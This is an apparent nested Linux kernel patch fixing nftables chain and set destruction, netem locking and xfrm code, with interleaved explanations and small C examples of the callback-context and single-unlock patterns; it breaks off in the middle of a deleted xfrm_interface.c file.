++		if (!nft_chain_binding(chain))
++			break;
++
++		/* Rule construction failed, but chain is already bound:
++		 * let the transaction records release this chain and its rules.
++		 */
++		if (chain->bound) {
++			chain->use--;
+ 			break;
++		}
+ 
++		/* Rule has been deleted, release chain and its rules. */
+ 		chain_ctx = *ctx;
+ 		chain_ctx.chain = chain;
+ 
+-		list_for_each_entry_safe(rule, n, &chain->rules, list)
+-			nf_tables_rule_release(&chain_ctx, rule);
+-
++		chain->use--;
++		list_for_each_entry_safe(rule, n, &chain->rules, list) {
++			chain->use--;
++			list_del(&rule->list);
++			nf_tables_rule_destroy(&chain_ctx, rule);
++		}
+ 		nf_tables_chain_destroy(&chain_ctx);
+ 		break;
+ 	default:
+diff --git a/net/netfilter/nft_set_bitmap.c b/net/netfilter/nft_set_bitmap.c
+index 96081ac8d2b4c..1e5e7a181e0bc 100644
+--- a/net/netfilter/nft_set_bitmap.c
++++ b/net/netfilter/nft_set_bitmap.c
+@@ -271,13 +271,14 @@ static int nft_bitmap_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
+-static void nft_bitmap_destroy(const struct nft_set *set)
++static void nft_bitmap_destroy(const struct nft_ctx *ctx,
++			       const struct nft_set *set)
+ {
+ 	struct nft_bitmap *priv = nft_set_priv(set);
+ 	struct nft_bitmap_elem *be, *n;
+ 
+ 	list_for_each_entry_safe(be, n, &priv->list, head)
+-		nft_set_elem_destroy(set, be, true);
++		nf_tables_set_elem_destroy(ctx, set, be);
+ }
+ 
+ static bool nft_bitmap_estimate(const struct nft_set_desc *desc, u32 features,
+diff --git a/net/netfilter/nft_set_hash.c b/net/netfilter/nft_set_hash.c
+index 76de6c8d98655..0b73cb0e752f7 100644
+--- a/net/netfilter/nft_set_hash.c
++++ b/net/netfilter/nft_set_hash.c
+@@ -400,19 +400,31 @@ static int nft_rhash_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
++struct nft_rhash_ctx {
++	const struct nft_ctx	ctx;
++	const struct nft_set	*set;
++};
++
+ static void nft_rhash_elem_destroy(void *ptr, void *arg)
+ {
+-	nft_set_elem_destroy(arg, ptr, true);
++	struct nft_rhash_ctx *rhash_ctx = arg;
++
++	nf_tables_set_elem_destroy(&rhash_ctx->ctx, rhash_ctx->set, ptr);
+ }
+ 
+-static void nft_rhash_destroy(const struct nft_set *set)
++static void nft_rhash_destroy(const struct nft_ctx *ctx,
++			      const struct nft_set *set)
+ {
+ 	struct nft_rhash *priv = nft_set_priv(set);
++	struct nft_rhash_ctx rhash_ctx = {
++		.ctx	= *ctx,
++		.set	= set,
++	};
+ 
+ 	cancel_delayed_work_sync(&priv->gc_work);
+ 	rcu_barrier();
+ 	rhashtable_free_and_destroy(&priv->ht, nft_rhash_elem_destroy,
+-				    (void *)set);
++				    (void *)&rhash_ctx);
+ }
+ 
+ /* Number of buckets is stored in u32, so cap our result to 1U<<31 */
+@@ -643,7 +655,8 @@ static int nft_hash_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
+-static void nft_hash_destroy(const struct nft_set *set)
++static void nft_hash_destroy(const struct nft_ctx *ctx,
++			     const struct nft_set *set)
+ {
+ 	struct nft_hash *priv = nft_set_priv(set);
+ 	struct nft_hash_elem *he;
+@@ -653,7 +666,7 @@ static void nft_hash_destroy(const struct nft_set *set)
+ 	for (i = 0; i < priv->buckets; i++) {
+ 		hlist_for_each_entry_safe(he, next, &priv->table[i], node) {
+ 			hlist_del_rcu(&he->node);
+-			nft_set_elem_destroy(set, he, true);
++			nf_tables_set_elem_destroy(ctx, set, he);
+ 		}
+ 	}
+ }
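
Among the ->destroy() signature changes, the rhash one is the instructive case: rhashtable_free_and_destroy() forwards only a single void *arg to its element callback, so the patch bundles the two values the callback now needs into an on-stack struct. The same void*-context idiom in plain C (container and names are illustrative):

    #include <stdio.h>

    struct ctx { const char *table; };
    struct set { const char *name; };

    /* Callback ABI fixed by the container: one element, one void *arg. */
    typedef void (*destroy_fn)(void *elem, void *arg);

    /* Like nft_rhash_ctx: bundle everything the callback needs. */
    struct destroy_ctx {
            const struct ctx *ctx;
            const struct set *set;
    };

    static void elem_destroy(void *elem, void *arg)
    {
            struct destroy_ctx *d = arg;

            printf("destroy elem %s (set %s, table %s)\n",
                   (char *)elem, d->set->name, d->ctx->table);
    }

    /* Stand-in for rhashtable_free_and_destroy(): the container walks,
     * the callback destroys, and 'arg' is threaded through untouched.
     */
    static void free_and_destroy(void **elems, int n, destroy_fn fn, void *arg)
    {
            int i;

            for (i = 0; i < n; i++)
                    fn(elems[i], arg);
    }

    int main(void)
    {
            struct ctx ctx = { "filter" };
            struct set set = { "blocklist" };
            struct destroy_ctx d = { &ctx, &set };
            void *elems[] = { "10.0.0.1", "10.0.0.2" };

            free_and_destroy(elems, 2, elem_destroy, &d);
            return 0;
    }
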
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 15e451dc3fc46..0452ee586c1cc 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1974,12 +1974,16 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 			    struct nft_set_iter *iter)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
++	struct net *net = read_pnet(&set->net);
+ 	struct nft_pipapo_match *m;
+ 	struct nft_pipapo_field *f;
+ 	int i, r;
+ 
+ 	rcu_read_lock();
+-	m = rcu_dereference(priv->match);
++	if (iter->genmask == nft_genmask_cur(net))
++		m = rcu_dereference(priv->match);
++	else
++		m = priv->clone;
+ 
+ 	if (unlikely(!m))
+ 		goto out;
+@@ -2148,10 +2152,12 @@ out_scratch:
+ 
+ /**
+  * nft_set_pipapo_match_destroy() - Destroy elements from key mapping array
++ * @ctx:	context
+  * @set:	nftables API set representation
+  * @m:		matching data pointing to key mapping array
+  */
+-static void nft_set_pipapo_match_destroy(const struct nft_set *set,
++static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,
++					 const struct nft_set *set,
+ 					 struct nft_pipapo_match *m)
+ {
+ 	struct nft_pipapo_field *f;
+@@ -2168,15 +2174,17 @@ static void nft_set_pipapo_match_destroy(const struct nft_set *set,
+ 
+ 		e = f->mt[r].e;
+ 
+-		nft_set_elem_destroy(set, e, true);
++		nf_tables_set_elem_destroy(ctx, set, e);
+ 	}
+ }
+ 
+ /**
+  * nft_pipapo_destroy() - Free private data for set and all committed elements
++ * @ctx:	context
+  * @set:	nftables API set representation
+  */
+-static void nft_pipapo_destroy(const struct nft_set *set)
++static void nft_pipapo_destroy(const struct nft_ctx *ctx,
++			       const struct nft_set *set)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_match *m;
+@@ -2186,7 +2194,7 @@ static void nft_pipapo_destroy(const struct nft_set *set)
+ 	if (m) {
+ 		rcu_barrier();
+ 
+-		nft_set_pipapo_match_destroy(set, m);
++		nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+ #ifdef NFT_PIPAPO_ALIGN
+ 		free_percpu(m->scratch_aligned);
+@@ -2203,7 +2211,7 @@ static void nft_pipapo_destroy(const struct nft_set *set)
+ 		m = priv->clone;
+ 
+ 		if (priv->dirty)
+-			nft_set_pipapo_match_destroy(set, m);
++			nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+ #ifdef NFT_PIPAPO_ALIGN
+ 		free_percpu(priv->clone->scratch_aligned);
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 2f114aa10f1a7..5c05c9b990fba 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -664,7 +664,8 @@ static int nft_rbtree_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
+-static void nft_rbtree_destroy(const struct nft_set *set)
++static void nft_rbtree_destroy(const struct nft_ctx *ctx,
++			       const struct nft_set *set)
+ {
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	struct nft_rbtree_elem *rbe;
+@@ -675,7 +676,7 @@ static void nft_rbtree_destroy(const struct nft_set *set)
+ 	while ((node = priv->root.rb_node) != NULL) {
+ 		rb_erase(node, &priv->root);
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+-		nft_set_elem_destroy(set, rbe, true);
++		nf_tables_set_elem_destroy(ctx, set, rbe);
+ 	}
+ }
+ 
+diff --git a/net/netfilter/xt_osf.c b/net/netfilter/xt_osf.c
+index e1990baf3a3b7..dc9485854002a 100644
+--- a/net/netfilter/xt_osf.c
++++ b/net/netfilter/xt_osf.c
+@@ -71,4 +71,3 @@ MODULE_AUTHOR("Evgeniy Polyakov <zbr@ioremap.net>");
+ MODULE_DESCRIPTION("Passive OS fingerprint matching.");
+ MODULE_ALIAS("ipt_osf");
+ MODULE_ALIAS("ip6t_osf");
+-MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_OSF);
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index fb00ac40ecb72..aa9842158df0a 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -966,6 +966,7 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	sch_tree_lock(sch);
+ 	/* backup q->clg and q->loss_model */
+ 	old_clg = q->clg;
+ 	old_loss_model = q->loss_model;
+@@ -974,7 +975,7 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 		ret = get_loss_clg(q, tb[TCA_NETEM_LOSS]);
+ 		if (ret) {
+ 			q->loss_model = old_loss_model;
+-			return ret;
++			goto unlock;
+ 		}
+ 	} else {
+ 		q->loss_model = CLG_RANDOM;
+@@ -1041,6 +1042,8 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 	/* capping jitter to the range acceptable by tabledist() */
+ 	q->jitter = min_t(s64, abs(q->jitter), INT_MAX);
+ 
++unlock:
++	sch_tree_unlock(sch);
+ 	return ret;
+ 
+ get_table_failure:
+@@ -1050,7 +1053,8 @@ get_table_failure:
+ 	 */
+ 	q->clg = old_clg;
+ 	q->loss_model = old_loss_model;
+-	return ret;
++
++	goto unlock;
+ }
+ 
+ static int netem_init(struct Qdisc *sch, struct nlattr *opt,
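
The netem fix widens the qdisc tree lock over the whole reconfiguration and funnels every exit, including the existing get_table_failure rollback, through a single unlock label instead of returning with the lock held. The single-exit pattern in miniature, with a pthread mutex standing in for sch_tree_lock():

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t tree_lock = PTHREAD_MUTEX_INITIALIZER;
    static int config = 1, backup;

    static int change(int new_cfg)
    {
            int ret = 0;

            pthread_mutex_lock(&tree_lock); /* sch_tree_lock(sch) */
            backup = config;                /* back up old state  */

            if (new_cfg < 0) {              /* e.g. parse failure */
                    ret = -22;              /* -EINVAL            */
                    goto restore;
            }
            config = new_cfg;
            goto unlock;                    /* success exits here too */

    restore:
            config = backup;                /* roll back, fall through */
    unlock:
            pthread_mutex_unlock(&tree_lock); /* sch_tree_unlock(sch) */
            return ret;
    }

    int main(void)
    {
            int ret = change(7);

            printf("ok:  ret=%d config=%d\n", ret, config);
            ret = change(-1);
            printf("err: ret=%d config=%d\n", ret, config);
            return 0;
    }
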
+diff --git a/net/xfrm/Makefile b/net/xfrm/Makefile
+index 494aa744bfb9a..08a2870fdd36f 100644
+--- a/net/xfrm/Makefile
++++ b/net/xfrm/Makefile
+@@ -3,6 +3,8 @@
+ # Makefile for the XFRM subsystem.
+ #
+ 
++xfrm_interface-$(CONFIG_XFRM_INTERFACE) += xfrm_interface_core.o
++
+ obj-$(CONFIG_XFRM) := xfrm_policy.o xfrm_state.o xfrm_hash.o \
+ 		      xfrm_input.o xfrm_output.o \
+ 		      xfrm_sysctl.o xfrm_replay.o xfrm_device.o
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index 2defd89da700d..ac1a645afa8df 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -131,6 +131,7 @@ struct sec_path *secpath_set(struct sk_buff *skb)
+ 	memset(sp->ovec, 0, sizeof(sp->ovec));
+ 	sp->olen = 0;
+ 	sp->len = 0;
++	sp->verified_cnt = 0;
+ 
+ 	return sp;
+ }
+diff --git a/net/xfrm/xfrm_interface.c b/net/xfrm/xfrm_interface.c
+deleted file mode 100644
+index 5a67b120c4dbd..0000000000000
+--- a/net/xfrm/xfrm_interface.c
++++ /dev/null
+@@ -1,1198 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *	XFRM virtual interface
+- *
+- *	Copyright (C) 2018 secunet Security Networks AG
+- *
+- *	Author:
+- *	Steffen Klassert <steffen.klassert@secunet.com>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/capability.h>
+-#include <linux/errno.h>
+-#include <linux/types.h>
+-#include <linux/sockios.h>
+-#include <linux/icmp.h>
+-#include <linux/if.h>
+-#include <linux/in.h>
+-#include <linux/ip.h>
+-#include <linux/net.h>
+-#include <linux/in6.h>
+-#include <linux/netdevice.h>
+-#include <linux/if_link.h>
+-#include <linux/if_arp.h>
+-#include <linux/icmpv6.h>
+-#include <linux/init.h>
+-#include <linux/route.h>
+-#include <linux/rtnetlink.h>
+-#include <linux/netfilter_ipv6.h>
+-#include <linux/slab.h>
+-#include <linux/hash.h>
+-
+-#include <linux/uaccess.h>
+-#include <linux/atomic.h>
+-
+-#include <net/icmp.h>
+-#include <net/ip.h>
+-#include <net/ipv6.h>
+-#include <net/ip6_route.h>
+-#include <net/ip_tunnels.h>
+-#include <net/addrconf.h>
+-#include <net/xfrm.h>
+-#include <net/net_namespace.h>
+-#include <net/dst_metadata.h>
+-#include <net/netns/generic.h>
+-#include <linux/etherdevice.h>
+-
+-static int xfrmi_dev_init(struct net_device *dev);
+-static void xfrmi_dev_setup(struct net_device *dev);
+-static struct rtnl_link_ops xfrmi_link_ops __read_mostly;
+-static unsigned int xfrmi_net_id __read_mostly;
+-static const struct net_device_ops xfrmi_netdev_ops;
+-
+-#define XFRMI_HASH_BITS	8
+-#define XFRMI_HASH_SIZE	BIT(XFRMI_HASH_BITS)
+-
+-struct xfrmi_net {
+-	/* lists for storing interfaces in use */
+-	struct xfrm_if __rcu *xfrmi[XFRMI_HASH_SIZE];
+-	struct xfrm_if __rcu *collect_md_xfrmi;
+-};
+-
+-static const struct nla_policy xfrm_lwt_policy[LWT_XFRM_MAX + 1] = {
+-	[LWT_XFRM_IF_ID]	= NLA_POLICY_MIN(NLA_U32, 1),
+-	[LWT_XFRM_LINK]		= NLA_POLICY_MIN(NLA_U32, 1),
+-};
+-
+-static void xfrmi_destroy_state(struct lwtunnel_state *lwt)
+-{
+-}
+-
+-static int xfrmi_build_state(struct net *net, struct nlattr *nla,
+-			     unsigned int family, const void *cfg,
+-			     struct lwtunnel_state **ts,
+-			     struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *tb[LWT_XFRM_MAX + 1];
+-	struct lwtunnel_state *new_state;
+-	struct xfrm_md_info *info;
+-	int ret;
+-
+-	ret = nla_parse_nested(tb, LWT_XFRM_MAX, nla, xfrm_lwt_policy, extack);
+-	if (ret < 0)
+-		return ret;
+-
+-	if (!tb[LWT_XFRM_IF_ID]) {
+-		NL_SET_ERR_MSG(extack, "if_id must be set");
+-		return -EINVAL;
+-	}
+-
+-	new_state = lwtunnel_state_alloc(sizeof(*info));
+-	if (!new_state) {
+-		NL_SET_ERR_MSG(extack, "failed to create encap info");
+-		return -ENOMEM;
+-	}
+-
+-	new_state->type = LWTUNNEL_ENCAP_XFRM;
+-
+-	info = lwt_xfrm_info(new_state);
+-
+-	info->if_id = nla_get_u32(tb[LWT_XFRM_IF_ID]);
+-
+-	if (tb[LWT_XFRM_LINK])
+-		info->link = nla_get_u32(tb[LWT_XFRM_LINK]);
+-
+-	*ts = new_state;
+-	return 0;
+-}
+-
+-static int xfrmi_fill_encap_info(struct sk_buff *skb,
+-				 struct lwtunnel_state *lwt)
+-{
+-	struct xfrm_md_info *info = lwt_xfrm_info(lwt);
+-
+-	if (nla_put_u32(skb, LWT_XFRM_IF_ID, info->if_id) ||
+-	    (info->link && nla_put_u32(skb, LWT_XFRM_LINK, info->link)))
+-		return -EMSGSIZE;
+-
+-	return 0;
+-}
+-
+-static int xfrmi_encap_nlsize(struct lwtunnel_state *lwtstate)
+-{
+-	return nla_total_size(sizeof(u32)) + /* LWT_XFRM_IF_ID */
+-		nla_total_size(sizeof(u32)); /* LWT_XFRM_LINK */
+-}
+-
+-static int xfrmi_encap_cmp(struct lwtunnel_state *a, struct lwtunnel_state *b)
+-{
+-	struct xfrm_md_info *a_info = lwt_xfrm_info(a);
+-	struct xfrm_md_info *b_info = lwt_xfrm_info(b);
+-
+-	return memcmp(a_info, b_info, sizeof(*a_info));
+-}
+-
+-static const struct lwtunnel_encap_ops xfrmi_encap_ops = {
+-	.build_state	= xfrmi_build_state,
+-	.destroy_state	= xfrmi_destroy_state,
+-	.fill_encap	= xfrmi_fill_encap_info,
+-	.get_encap_size = xfrmi_encap_nlsize,
+-	.cmp_encap	= xfrmi_encap_cmp,
+-	.owner		= THIS_MODULE,
+-};
+-
+-#define for_each_xfrmi_rcu(start, xi) \
+-	for (xi = rcu_dereference(start); xi; xi = rcu_dereference(xi->next))
+-
+-static u32 xfrmi_hash(u32 if_id)
+-{
+-	return hash_32(if_id, XFRMI_HASH_BITS);
+-}
+-
+-static struct xfrm_if *xfrmi_lookup(struct net *net, struct xfrm_state *x)
+-{
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-	struct xfrm_if *xi;
+-
+-	for_each_xfrmi_rcu(xfrmn->xfrmi[xfrmi_hash(x->if_id)], xi) {
+-		if (x->if_id == xi->p.if_id &&
+-		    (xi->dev->flags & IFF_UP))
+-			return xi;
+-	}
+-
+-	xi = rcu_dereference(xfrmn->collect_md_xfrmi);
+-	if (xi && (xi->dev->flags & IFF_UP))
+-		return xi;
+-
+-	return NULL;
+-}
+-
+-static bool xfrmi_decode_session(struct sk_buff *skb,
+-				 unsigned short family,
+-				 struct xfrm_if_decode_session_result *res)
+-{
+-	struct net_device *dev;
+-	struct xfrm_if *xi;
+-	int ifindex = 0;
+-
+-	if (!secpath_exists(skb) || !skb->dev)
+-		return false;
+-
+-	switch (family) {
+-	case AF_INET6:
+-		ifindex = inet6_sdif(skb);
+-		break;
+-	case AF_INET:
+-		ifindex = inet_sdif(skb);
+-		break;
+-	}
+-
+-	if (ifindex) {
+-		struct net *net = xs_net(xfrm_input_state(skb));
+-
+-		dev = dev_get_by_index_rcu(net, ifindex);
+-	} else {
+-		dev = skb->dev;
+-	}
+-
+-	if (!dev || !(dev->flags & IFF_UP))
+-		return false;
+-	if (dev->netdev_ops != &xfrmi_netdev_ops)
+-		return false;
+-
+-	xi = netdev_priv(dev);
+-	res->net = xi->net;
+-
+-	if (xi->p.collect_md)
+-		res->if_id = xfrm_input_state(skb)->if_id;
+-	else
+-		res->if_id = xi->p.if_id;
+-	return true;
+-}
+-
+-static void xfrmi_link(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
+-{
+-	struct xfrm_if __rcu **xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
+-
+-	rcu_assign_pointer(xi->next , rtnl_dereference(*xip));
+-	rcu_assign_pointer(*xip, xi);
+-}
+-
+-static void xfrmi_unlink(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
+-{
+-	struct xfrm_if __rcu **xip;
+-	struct xfrm_if *iter;
+-
+-	for (xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
+-	     (iter = rtnl_dereference(*xip)) != NULL;
+-	     xip = &iter->next) {
+-		if (xi == iter) {
+-			rcu_assign_pointer(*xip, xi->next);
+-			break;
+-		}
+-	}
+-}
+-
+-static void xfrmi_dev_free(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-
+-	gro_cells_destroy(&xi->gro_cells);
+-	free_percpu(dev->tstats);
+-}
+-
+-static int xfrmi_create(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net *net = dev_net(dev);
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-	int err;
+-
+-	dev->rtnl_link_ops = &xfrmi_link_ops;
+-	err = register_netdevice(dev);
+-	if (err < 0)
+-		goto out;
+-
+-	if (xi->p.collect_md)
+-		rcu_assign_pointer(xfrmn->collect_md_xfrmi, xi);
+-	else
+-		xfrmi_link(xfrmn, xi);
+-
+-	return 0;
+-
+-out:
+-	return err;
+-}
+-
+-static struct xfrm_if *xfrmi_locate(struct net *net, struct xfrm_if_parms *p)
+-{
+-	struct xfrm_if __rcu **xip;
+-	struct xfrm_if *xi;
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-
+-	for (xip = &xfrmn->xfrmi[xfrmi_hash(p->if_id)];
+-	     (xi = rtnl_dereference(*xip)) != NULL;
+-	     xip = &xi->next)
+-		if (xi->p.if_id == p->if_id)
+-			return xi;
+-
+-	return NULL;
+-}
+-
+-static void xfrmi_dev_uninit(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct xfrmi_net *xfrmn = net_generic(xi->net, xfrmi_net_id);
+-
+-	if (xi->p.collect_md)
+-		RCU_INIT_POINTER(xfrmn->collect_md_xfrmi, NULL);
+-	else
+-		xfrmi_unlink(xfrmn, xi);
+-}
+-
+-static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
+-{
+-	skb_clear_tstamp(skb);
+-	skb->pkt_type = PACKET_HOST;
+-	skb->skb_iif = 0;
+-	skb->ignore_df = 0;
+-	skb_dst_drop(skb);
+-	nf_reset_ct(skb);
+-	nf_reset_trace(skb);
+-
+-	if (!xnet)
+-		return;
+-
+-	ipvs_reset(skb);
+-	secpath_reset(skb);
+-	skb_orphan(skb);
+-	skb->mark = 0;
+-}
+-
+-static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+-{
+-	const struct xfrm_mode *inner_mode;
+-	struct net_device *dev;
+-	struct xfrm_state *x;
+-	struct xfrm_if *xi;
+-	bool xnet;
+-	int link;
+-
+-	if (err && !secpath_exists(skb))
+-		return 0;
+-
+-	x = xfrm_input_state(skb);
+-
+-	xi = xfrmi_lookup(xs_net(x), x);
+-	if (!xi)
+-		return 1;
+-
+-	link = skb->dev->ifindex;
+-	dev = xi->dev;
+-	skb->dev = dev;
+-
+-	if (err) {
+-		dev->stats.rx_errors++;
+-		dev->stats.rx_dropped++;
+-
+-		return 0;
+-	}
+-
+-	xnet = !net_eq(xi->net, dev_net(skb->dev));
+-
+-	if (xnet) {
+-		inner_mode = &x->inner_mode;
+-
+-		if (x->sel.family == AF_UNSPEC) {
+-			inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
+-			if (inner_mode == NULL) {
+-				XFRM_INC_STATS(dev_net(skb->dev),
+-					       LINUX_MIB_XFRMINSTATEMODEERROR);
+-				return -EINVAL;
+-			}
+-		}
+-
+-		if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb,
+-				       inner_mode->family))
+-			return -EPERM;
+-	}
+-
+-	xfrmi_scrub_packet(skb, xnet);
+-	if (xi->p.collect_md) {
+-		struct metadata_dst *md_dst;
+-
+-		md_dst = metadata_dst_alloc(0, METADATA_XFRM, GFP_ATOMIC);
+-		if (!md_dst)
+-			return -ENOMEM;
+-
+-		md_dst->u.xfrm_info.if_id = x->if_id;
+-		md_dst->u.xfrm_info.link = link;
+-		skb_dst_set(skb, (struct dst_entry *)md_dst);
+-	}
+-	dev_sw_netstats_rx_add(dev, skb->len);
+-
+-	return 0;
+-}
+-
+-static int
+-xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+-	struct dst_entry *dst = skb_dst(skb);
+-	unsigned int length = skb->len;
+-	struct net_device *tdev;
+-	struct xfrm_state *x;
+-	int err = -1;
+-	u32 if_id;
+-	int mtu;
+-
+-	if (xi->p.collect_md) {
+-		struct xfrm_md_info *md_info = skb_xfrm_md_info(skb);
+-
+-		if (unlikely(!md_info))
+-			return -EINVAL;
+-
+-		if_id = md_info->if_id;
+-		fl->flowi_oif = md_info->link;
+-	} else {
+-		if_id = xi->p.if_id;
+-	}
+-
+-	dst_hold(dst);
+-	dst = xfrm_lookup_with_ifid(xi->net, dst, fl, NULL, 0, if_id);
+-	if (IS_ERR(dst)) {
+-		err = PTR_ERR(dst);
+-		dst = NULL;
+-		goto tx_err_link_failure;
+-	}
+-
+-	x = dst->xfrm;
+-	if (!x)
+-		goto tx_err_link_failure;
+-
+-	if (x->if_id != if_id)
+-		goto tx_err_link_failure;
+-
+-	tdev = dst->dev;
+-
+-	if (tdev == dev) {
+-		stats->collisions++;
+-		net_warn_ratelimited("%s: Local routing loop detected!\n",
+-				     dev->name);
+-		goto tx_err_dst_release;
+-	}
+-
+-	mtu = dst_mtu(dst);
+-	if ((!skb_is_gso(skb) && skb->len > mtu) ||
+-	    (skb_is_gso(skb) && !skb_gso_validate_network_len(skb, mtu))) {
+-		skb_dst_update_pmtu_no_confirm(skb, mtu);
+-
+-		if (skb->protocol == htons(ETH_P_IPV6)) {
+-			if (mtu < IPV6_MIN_MTU)
+-				mtu = IPV6_MIN_MTU;
+-
+-			if (skb->len > 1280)
+-				icmpv6_ndo_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu);
+-			else
+-				goto xmit;
+-		} else {
+-			if (!(ip_hdr(skb)->frag_off & htons(IP_DF)))
+-				goto xmit;
+-			icmp_ndo_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
+-				      htonl(mtu));
+-		}
+-
+-		dst_release(dst);
+-		return -EMSGSIZE;
+-	}
+-
+-xmit:
+-	xfrmi_scrub_packet(skb, !net_eq(xi->net, dev_net(dev)));
+-	skb_dst_set(skb, dst);
+-	skb->dev = tdev;
+-
+-	err = dst_output(xi->net, skb->sk, skb);
+-	if (net_xmit_eval(err) == 0) {
+-		dev_sw_netstats_tx_add(dev, 1, length);
+-	} else {
+-		stats->tx_errors++;
+-		stats->tx_aborted_errors++;
+-	}
+-
+-	return 0;
+-tx_err_link_failure:
+-	stats->tx_carrier_errors++;
+-	dst_link_failure(skb);
+-tx_err_dst_release:
+-	dst_release(dst);
+-	return err;
+-}
+-
+-static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+-	struct dst_entry *dst = skb_dst(skb);
+-	struct flowi fl;
+-	int ret;
+-
+-	memset(&fl, 0, sizeof(fl));
+-
+-	switch (skb->protocol) {
+-	case htons(ETH_P_IPV6):
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+-		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
+-		if (!dst) {
+-			fl.u.ip6.flowi6_oif = dev->ifindex;
+-			fl.u.ip6.flowi6_flags |= FLOWI_FLAG_ANYSRC;
+-			dst = ip6_route_output(dev_net(dev), NULL, &fl.u.ip6);
+-			if (dst->error) {
+-				dst_release(dst);
+-				stats->tx_carrier_errors++;
+-				goto tx_err;
+-			}
+-			skb_dst_set(skb, dst);
+-		}
+-		break;
+-	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+-		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
+-		if (!dst) {
+-			struct rtable *rt;
+-
+-			fl.u.ip4.flowi4_oif = dev->ifindex;
+-			fl.u.ip4.flowi4_flags |= FLOWI_FLAG_ANYSRC;
+-			rt = __ip_route_output_key(dev_net(dev), &fl.u.ip4);
+-			if (IS_ERR(rt)) {
+-				stats->tx_carrier_errors++;
+-				goto tx_err;
+-			}
+-			skb_dst_set(skb, &rt->dst);
+-		}
+-		break;
+-	default:
+-		goto tx_err;
+-	}
+-
+-	fl.flowi_oif = xi->p.link;
+-
+-	ret = xfrmi_xmit2(skb, dev, &fl);
+-	if (ret < 0)
+-		goto tx_err;
+-
+-	return NETDEV_TX_OK;
+-
+-tx_err:
+-	stats->tx_errors++;
+-	stats->tx_dropped++;
+-	kfree_skb(skb);
+-	return NETDEV_TX_OK;
+-}
+-
+-static int xfrmi4_err(struct sk_buff *skb, u32 info)
+-{
+-	const struct iphdr *iph = (const struct iphdr *)skb->data;
+-	struct net *net = dev_net(skb->dev);
+-	int protocol = iph->protocol;
+-	struct ip_comp_hdr *ipch;
+-	struct ip_esp_hdr *esph;
+-	struct ip_auth_hdr *ah ;
+-	struct xfrm_state *x;
+-	struct xfrm_if *xi;
+-	__be32 spi;
+-
+-	switch (protocol) {
+-	case IPPROTO_ESP:
+-		esph = (struct ip_esp_hdr *)(skb->data+(iph->ihl<<2));
+-		spi = esph->spi;
+-		break;
+-	case IPPROTO_AH:
+-		ah = (struct ip_auth_hdr *)(skb->data+(iph->ihl<<2));
+-		spi = ah->spi;
+-		break;
+-	case IPPROTO_COMP:
+-		ipch = (struct ip_comp_hdr *)(skb->data+(iph->ihl<<2));
+-		spi = htonl(ntohs(ipch->cpi));
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	switch (icmp_hdr(skb)->type) {
+-	case ICMP_DEST_UNREACH:
+-		if (icmp_hdr(skb)->code != ICMP_FRAG_NEEDED)
+-			return 0;
+-		break;
+-	case ICMP_REDIRECT:
+-		break;
+-	default:
+-		return 0;
+-	}
+-
